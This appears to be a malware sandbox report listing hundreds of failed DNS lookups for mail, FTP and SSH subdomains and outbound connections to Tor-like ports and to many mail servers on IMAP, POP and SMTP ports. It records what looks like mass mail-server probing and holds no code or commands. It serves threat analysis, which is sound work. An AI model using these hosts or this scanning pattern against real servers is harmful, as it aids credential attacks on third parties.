Source: unknown	DNS traffic detected: query: ftp.distraction.com.au replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: ftp.vesond.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.mercor.compl replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.rdhppx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.sitehalogen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.enhancementsmast.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.srlbonfon9.com.hk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.asdfhjlasdfhjlk1.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.saskgmail.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.earnmagabucks.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.jesusanswwers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.joserafael.com.ve replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hyiquu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.gn.ais.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: excursionesmadryn.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.dinfos.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.daystarbookscharity.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hyiquu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.nhclex.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.9a07f8a339ec2a3e.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.bopclip.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.jesusanswwers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: distraction.com.au replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: imap.rumbeandoelmundo.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.mywitce.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.souriahost.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smartiebritches-com.mail.protection.outlook.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.jesusanswwers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.djmeca.com.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: asdfhjlasdfhjlk1.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.chemcaregroup.compg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nsorekek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.asdfhjlasdfhjlk1.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.vesond.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.dinfos.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.buyhits.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.mobileuser.baihe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.souriahost.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.taylorbryant.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.dinfos.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.daystarbookscharity.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.asdfhjlasdfhjlk1.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: caribbean360-com.p30.spamhero.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.dresslermd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.bopclip.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.nsorekek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hodginssmithconsulting.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.souriahost.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.jesusanswwers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.cominex.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.piiyuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.e-manage.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hoefakker.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.select-feeds.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.earnmagabucks.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.daystarbookscharity.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.arbsdecq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.vesond.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.mywitce.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.williamcroy.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.dresslermd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.daystarbookscharity.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.acaiforcemaxweightloss.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.distraction.com.au replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: mail.9a07f8a339ec2a3e.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: souriahost.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.nhclex.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.rio-perfume.orgua replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.sitehalogen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.bilfinger.comqa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.bilfinger.comqa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.saskgmail.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hermanassociatesnewyork.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.excursionesmadryn.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.rio-perfume.orgua replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.harrell-associates.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: saskgmail.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.studnets.ocps.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.srlbonfon9.com.hk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.dm.famm.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.154892628.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.bopclip.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.saskgmail.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.sitehalogen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.91069b3d854a1035.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.mobile.baihe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.djmeca.com.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.asdfhjlasdfhjlk1.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hermanassociatesnewyork.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.earnmagabucks.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.integral-tours.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.saskgmail.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.freedhal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: srlbonfon9.com.hk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.daystarbookscharity.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.mywitce.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.nhclex.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.sodataol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.rumbeandoelmundo.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.mobile.baihe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.buyhits.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.studnets.ocps.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.taylorbryant.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: freedhal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gpa.orgau replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cominex.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jesusanswwers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.gpa.orgau replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.freedhal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.sitehalogen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.dm.famm.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.freedhal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.select-feeds.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.chemcaregroup.compg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.piiyuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.djmeca.com.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.piiyuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.earnmagabucks.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: enhancementsmast.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.djmeca.com.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.rdhppx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.154892628.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hodginssmithconsulting.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.gn.ais.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: arbsdecq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.sodataol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.mobile.baihe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: select-feeds.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hoefakker.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rdhppx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.freedhal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.rumbeandoelmundo.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.excursionesmadryn.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.aurora-resorts.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.excursionesmadryn.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.ambquinn.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.firsteuropaglobal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.joserafael.com.ve replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.aurora-resorts.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.bilfinger.comqa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.srlbonfon9.com.hk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.nhclex.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.jesusanswwers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.rdhppx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hermanassociatesnewyork.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.acaiforcemaxweightloss.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.mercor.compl replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.cominex.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.saskgmail.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.aurora-resorts.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.srlbonfon9.com.hk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.mercor.compl replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.cominex.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.dm.famm.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ambquinn.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.djmeca.com.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.gpa.orgau replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.mywitce.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.acaiforcemaxweightloss.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.rumbeandoelmundo.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.ambquinn.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.djaskdas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: piiyuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.rdhppx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.rio-perfume.orgua replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.distraction.com.au replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: imap.dm.famm.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.williamcroy.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.154892628.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.distraction.com.au replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: pop3.sitehalogen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.acaiforcemaxweightloss.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.cominex.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.dresslermd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.maroonshockey.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.integral-tours.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.buyhits.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.freedhal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.buyhits.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dresslermd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.enhancementsmast.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.studnets.ocps.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.263host.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.91069b3d854a1035.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.9a07f8a339ec2a3e.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.integral-tours.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hyiquu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.9a07f8a339ec2a3e.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.cominex.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.ambquinn.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.studnets.ocps.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.djaskdas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.joserafael.com.ve replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.firsteuropaglobal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.taylorbryant.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.nsorekek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.taylorbryant.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.gn.ais.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9a07f8a339ec2a3e.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hoefakker.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.91069b3d854a1035.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.gn.ais.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.bilfinger.comqa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.vesond.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.91069b3d854a1035.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rumbeandoelmundo.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: daystarbookscharity.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.gpa.orgau replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hermanassociatesnewyork.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hoefakker.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.ambquinn.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.firsteuropaglobal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.263host.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.djaskdas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hoefakker.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.earnmagabucks.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.sitehalogen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.vesond.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: caribbean360-com.p20.spamhero.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.chemcaregroup.compg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.select-feeds.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.9a07f8a339ec2a3e.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.mobile.baihe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: caribbean360-com.p10.spamhero.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.souriahost.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: acaiforcemaxweightloss.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.sodataol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.mywitce.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.rio-perfume.orgua replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.piiyuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rio-perfume.orgua replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.souriahost.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.djmeca.com.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.select-feeds.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hoefakker.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.nhclex.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vesond.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.ambquinn.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.e-manage.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hodginssmithconsulting.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aurora-resorts.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.nhclex.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.91069b3d854a1035.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bopclip.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chemcaregroup.compg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.distraction.com.au replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: dayfarrichjwclik.fun replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.piiyuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.cominex.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.mercor.compl replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: taylorbryant.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.djaskdas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.piiyuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.dinfos.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: onualituyrs.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.nhclex.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.vesond.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.bopclip.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.mobile.baihe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.williamcroy.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hermanassociatesnewyork.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.souriahost.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.williamcroy.plus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hyiquu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.arbsdecq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.chemcaregroup.compg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.e-manage.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.rio-perfume.orgua replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.select-feeds.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hyiquu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.enhancementsmast.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.91069b3d854a1035.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.excursionesmadryn.com.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.djaskdas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.arbsdecq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.dinfos.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.enhancementsmast.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.taylorbryant.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gn.ais.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.pkmanagment.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.263host.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.freedhal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.mywitce.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mywitce.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.saskgmail.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.nsorekek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.pmcsystem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.dm.famm.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.integral-tours.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.gpa.orgau replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.jesusanswwers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.gn.ais.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.arbsdecq.com replaycode: Name error (3)

Source: unknown

Network traffic detected: DNS query count 771

Source: unknown

Network traffic detected: IP country count 21

Source: global traffic	TCP traffic: 192.168.2.4:49745 -> 162.212.158.82:9001
Source: global traffic	TCP traffic: 192.168.2.4:49765 -> 91.121.86.59:993
Source: global traffic	TCP traffic: 192.168.2.4:49800 -> 213.144.142.24:9001
Source: global traffic	TCP traffic: 192.168.2.4:49802 -> 185.220.101.22:30022
Source: global traffic	TCP traffic: 192.168.2.4:49803 -> 85.146.92.119:9001
Source: global traffic	TCP traffic: 192.168.2.4:49805 -> 138.2.171.103:9001
Source: global traffic	TCP traffic: 192.168.2.4:49807 -> 77.174.164.37:9001
Source: global traffic	TCP traffic: 192.168.2.4:49808 -> 89.191.217.1:9001
Source: global traffic	TCP traffic: 192.168.2.4:49810 -> 37.200.99.251:9001
Source: global traffic	TCP traffic: 192.168.2.4:49811 -> 15.204.141.95:8080
Source: global traffic	TCP traffic: 192.168.2.4:49813 -> 195.122.181.242:9001
Source: global traffic	TCP traffic: 192.168.2.4:49814 -> 82.66.249.246:9444
Source: global traffic	TCP traffic: 192.168.2.4:49815 -> 185.220.101.209:8443
Source: global traffic	TCP traffic: 192.168.2.4:49817 -> 142.44.227.24:9191
Source: global traffic	TCP traffic: 192.168.2.4:53901 -> 185.230.63.107:143
Source: global traffic	TCP traffic: 192.168.2.4:53899 -> 3.94.41.167:143
Source: global traffic	TCP traffic: 192.168.2.4:54705 -> 107.158.136.76:143
Source: global traffic	TCP traffic: 192.168.2.4:54767 -> 3.33.130.190:995
Source: global traffic	TCP traffic: 192.168.2.4:54922 -> 104.47.59.138:143
Source: global traffic	TCP traffic: 192.168.2.4:55127 -> 216.69.141.82:143
Source: global traffic	TCP traffic: 192.168.2.4:55143 -> 31.214.176.67:143
Source: global traffic	TCP traffic: 192.168.2.4:55191 -> 104.47.74.202:143
Source: global traffic	TCP traffic: 192.168.2.4:55216 -> 50.31.65.5:995
Source: global traffic	TCP traffic: 192.168.2.4:55249 -> 52.101.9.0:995
Source: global traffic	TCP traffic: 192.168.2.4:55290 -> 96.249.39.20:995
Source: global traffic	TCP traffic: 192.168.2.4:55297 -> 52.165.155.237:26
Source: global traffic	TCP traffic: 192.168.2.4:55435 -> 64.233.184.26:995
Source: global traffic	TCP traffic: 192.168.2.4:55441 -> 8.31.233.168:995
Source: global traffic	TCP traffic: 192.168.2.4:55447 -> 64.233.186.27:143
Source: global traffic	TCP traffic: 192.168.2.4:55489 -> 18.208.22.79:143
Source: global traffic	TCP traffic: 192.168.2.4:55525 -> 34.206.39.153:995
Source: global traffic	TCP traffic: 192.168.2.4:55636 -> 34.205.242.146:143
Source: global traffic	TCP traffic: 192.168.2.4:55639 -> 104.21.69.169:143
Source: global traffic	TCP traffic: 192.168.2.4:55640 -> 209.182.195.165:995
Source: global traffic	TCP traffic: 192.168.2.4:55648 -> 67.195.204.83:995
Source: global traffic	TCP traffic: 192.168.2.4:55656 -> 199.59.243.225:143
Source: global traffic	TCP traffic: 192.168.2.4:55663 -> 212.159.8.200:3535
Source: global traffic	TCP traffic: 192.168.2.4:55666 -> 208.91.197.26:143
Source: global traffic	TCP traffic: 192.168.2.4:55669 -> 104.47.75.164:587
Source: global traffic	TCP traffic: 192.168.2.4:55670 -> 34.196.6.209:220
Source: global traffic	TCP traffic: 192.168.2.4:55700 -> 13.248.169.48:26
Source: global traffic	TCP traffic: 192.168.2.4:55701 -> 209.222.82.253:995
Source: global traffic	TCP traffic: 192.168.2.4:55704 -> 205.178.189.129:143
Source: global traffic	TCP traffic: 192.168.2.4:55708 -> 209.222.82.255:26
Source: global traffic	TCP traffic: 192.168.2.4:55739 -> 44.194.75.85:993
Source: global traffic	TCP traffic: 192.168.2.4:55741 -> 177.153.23.241:587
Source: global traffic	TCP traffic: 192.168.2.4:55742 -> 177.153.23.242:220
Source: global traffic	TCP traffic: 192.168.2.4:55771 -> 54.161.222.85:995
Source: global traffic	TCP traffic: 192.168.2.4:55843 -> 38.177.197.58:143
Source: global traffic	TCP traffic: 192.168.2.4:55886 -> 38.181.56.100:143
Source: global traffic	TCP traffic: 192.168.2.4:55902 -> 205.139.110.221:995
Source: global traffic	TCP traffic: 192.168.2.4:55905 -> 3.126.94.219:143
Source: global traffic	TCP traffic: 192.168.2.4:55924 -> 185.162.89.66:143
Source: global traffic	TCP traffic: 192.168.2.4:55928 -> 104.47.66.10:143
Source: global traffic	TCP traffic: 192.168.2.4:55947 -> 121.53.85.23:143
Source: global traffic	TCP traffic: 192.168.2.4:55982 -> 115.111.182.213:220
Source: global traffic	TCP traffic: 192.168.2.4:56050 -> 148.163.129.50:143
Source: global traffic	TCP traffic: 192.168.2.4:56070 -> 85.234.244.76:143
Source: global traffic	TCP traffic: 192.168.2.4:56073 -> 142.250.27.26:143
Source: global traffic	TCP traffic: 192.168.2.4:56076 -> 202.130.44.227:143
